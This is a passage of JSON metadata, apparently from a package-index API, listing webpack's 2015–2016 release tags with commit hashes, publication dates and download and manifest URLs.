hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta/manifests"},{"name":"v2.0.5-beta","sha":"ac45c3c1a4c9b51eceecba79c6ae1a60887368de","kind":"tag","published_at":"2016-01-26T17:20:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.5-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.5-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.5-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta/manifests"},{"name":"v1.12.12","sha":"c0420f1ca8e2a444a5b5192a58d88d8d7d710bb7","kind":"tag","published_at":"2016-01-23T12:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12/manifests"},{"name":"v2.0.4-beta","sha":"bba8afdeef79a7c6e1be6688107fdff3109463bc","kind":"tag","published_at":"2016-01-21T18:19:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.4-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.4-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.4-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta/manifests"},{"name":"v2.0.3-beta","sha":"b7754b645e50608165e0a28ca4735cd0efcfa0d9","kind":"tag","published_at":"2016-01-21T18:16:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.3-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.3-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.3-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta/manifests"},{"name":"v1.12.11","sha":"ab433884f140d694241c54e9c6f9de7f049aec6d","kind":"tag","published_at":"2016-01-11T18:14:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11/manifests"},{"name":"v1.12.10","sha":"66142f2f89868b8e380c4883513cb974680e20e2","kind":"tag","published_at":"2016-01-06T19:29:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10/manifests"},{"name":"v2.0.2-beta","sha":"0915889feb8558a07b053010e56748566e108285","kind":"tag","published_at":"2015-12-22T11:53:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.2-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.2-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.2-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta/manifests"},{"name":"v2.0.1-beta","sha":"11932d75a4c8034e5d8afb50985159d33fdb8ddc","kind":"tag","published_at":"2015-11-24T07:28:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.1-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.1-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.1-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta/manifests"},{"name":"v1.12.9","sha":"9766f2bde3c3f3e7b3b0e914c9cb81ea3a12e823","kind":"tag","published_at":"2015-11-24T07:09:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9/manifests"},{"name":"v1.12.8","sha":"b59528164913d1234e9dccc55bdfbba2e75767d2","kind":"tag","published_at":"2015-11-20T20:32:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8/manifests"},{"name":"v1.12.7","sha":"a6c4414a7f38d8098f128bc50e8c83ed4a9de607","kind":"tag","published_at":"2015-11-20T19:32:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7/manifests"},{"name":"v1.12.6","sha":"7c3e68e8df03cdcef7a6102f61ed4b8cc91cda78","kind":"tag","published_at":"2015-11-14T08:29:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6/manifests"},{"name":"v1.12.5","sha":"3266bbcd16f8a80c35fcd518bf2fb2fe8997692c","kind":"tag","published_at":"2015-11-13T21:25:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5/manifests"},{"name":"v1.12.4","sha":"530f669e13770ccf5082f29dbde1b114e6173a07","kind":"tag","published_at":"2015-11-10T20:29:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4/manifests"},{"name":"v1.12.3","sha":"f3d65ef1b5a6ebba85083536e3a705fe96d31220","kind":"tag","published_at":"2015-11-06T00:10:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3/manifests"},{"name":"v2.0.0-beta","sha":"b2ba75b4c4360b0f14cb23fdb66355457de6f810","kind":"commit","published_at":"2015-11-01T22:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta/manifests"},{"name":"v1.12.2","sha":"89fda6a575eb379d974a30a5229d74c77ba35cc5","kind":"tag","published_at":"2015-09-16T21:13:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"cfcac5e3b62a52012318204dc798d7394e9ac6a9","kind":"tag","published_at":"2015-09-03T12:26:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"f155f32271ff81fee546c86b5685803377cebc09","kind":"tag","published_at":"2015-08-25T08:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"5335781be8c06c2ff9443431a196f6a94ca80bb3","kind":"tag","published_at":"2015-08-06T11:30:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0/manifests"},{"name":"v1.10.5","sha":"c4d78f7ca6e4a20e5b68f2720970a08cadb013e4","kind":"tag","published_at":"2015-07-23T22:04:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5/manifests"},{"name":"v1.10.4","sha":"107aa63c452d46c0628c53b856bd95e7e3d1b4ed","kind":"tag","published_at":"2015-07-23T21:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4/manifests"},{"name":"v1.10.3","sha":"b99eb70ce63ad33e23e9eef5ee6b4511846acba2","kind":"tag","published_at":"2015-07-22T21:53:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"c2a8b8a843609cbeeeafe92f81894dbe306d38a0","kind":"tag","published_at":"2015-07-22T20:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"f711f66f4cec8c72ba6a831eba8e662149508951","kind":"tag","published_at":"2015-07-02T13:25:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"df4e2e4e3df27d682feb962b896595d7eab27c2a","kind":"tag","published_at":"2015-06-27T20:50:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0/manifests"},{"name":"v1.9.13","sha":"e925c52a0e9fa55b06ffcc3b575e7f1621714056","kind":"tag","published_at":"2015-06-27T09:38:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13/manifests"},{"name":"v1.9.12","sha":"ba03fda4b5d2a515ccd87d26f3edd0dd357c4fde","kind":"tag","published_at":"2015-06-24T21:24:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12/manifests"},{"name":"v1.9.11","sha":"4c0f4afe8710376726a85c756729dc5e0b86fb95","kind":"tag","published_at":"2015-06-14T10:05:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11/manifests"},{"name":"v1.9.10","sha":"4de7bed0f946e42e6dde546ba35233e4eeb87c9d","kind":"tag","published_at":"2015-05-25T19:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10/manifests"},{"name":"v1.9.9","sha":"407d1bc76b41717a47f87211ffd6cbdfff6c7b1e","kind":"tag","published_at":"2015-05-24T07:35:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9/manifests"},{"name":"v1.9.8","sha":"69df24cc562c10caf5c02f36459ecacb7cd1823d","kind":"tag","published_at":"2015-05-21T22:16:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8/manifests"},{"name":"v1.9.7","sha":"0990aaa4754969e34184657577389b88fd845e87","kind":"tag","published_at":"2015-05-17T17:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7/manifests"},{"name":"v1.9.6","sha":"c5eceb0b2cf31fca84e724d3893d44c7042b9038","kind":"tag","published_at":"2015-05-15T15:24:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6/manifests"},{"name":"v1.9.5","sha":"e37a50683f74d6996373186db757289256a41bf7","kind":"tag","published_at":"2015-05-12T19:21:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5/manifests"},{"name":"v1.9.4","sha":"ac84ef731540635f615438cc8f4424ff63003ce1","kind":"tag","published_at":"2015-05-10T16:45:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4/manifests"},{"name":"v1.9.3","sha":"c7ac77fc907950dcf0dc355fae86164f688f9857","kind":"tag","published_at":"2015-05-10T14:44:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3/manifests"},{"name":"v1.9.2","sha":"0576143e96be118e4621f79db4b8d03b6d2c808e","kind":"tag","published_at":"2015-05-10T12:37:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"98663e71dbacfb82e02379671a821a373150dc7c","kind":"tag","published_at":"2015-05-10T11:53:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"0e21e6ec0b2e4ebc085c9e6ccf823480384e3943","kind":"tag","published_at":"2015-05-10T10:23:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0/manifests"},{"name":"v1.8.11","sha":"f7d7d30ee647dd8fc77972752d5b9fc47bbe09ea","kind":"tag","published_at":"2015-04-29T10:49:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11/manifests"},{"name":"v1.8.10","sha":"8e490bdee33dd4edea82c6d13ba80c6fe3246218","kind":"tag","published_at":"2015-04-26T20:50:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10/manifests"},{"name":"v1.8.9","sha":"e4453c78edb4613804c0c0a0e9f447d2def533c3","kind":"tag","published_at":"2015-04-21T21:34:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9/manifests"},{"name":"v1.8.8","sha":"924e02c98aba21b65d913a1f0e16d8818f018c3b","kind":"tag","published_at":"2015-04-21T06:38:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8/manifests"},{"name":"v1.8.7","sha":"0bc887a06c7f34a95e2756097f193f15ec1a443d","kind":"tag","published_at":"2015-04-20T18:51:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7/manifests"},{"name":"v1.8.6","sha":"a27641f8cc68ec557d9ca524afbbfb3b34ec2408","kind":"tag","published_at":"2015-04-20T17:46:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6/manifests"},{"name":"v1.8.5","sha":"53a534663446bfaa8fc4b3c202542d6a8a2aaadc","kind":"tag","published_at":"2015-04-17T08:26:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/w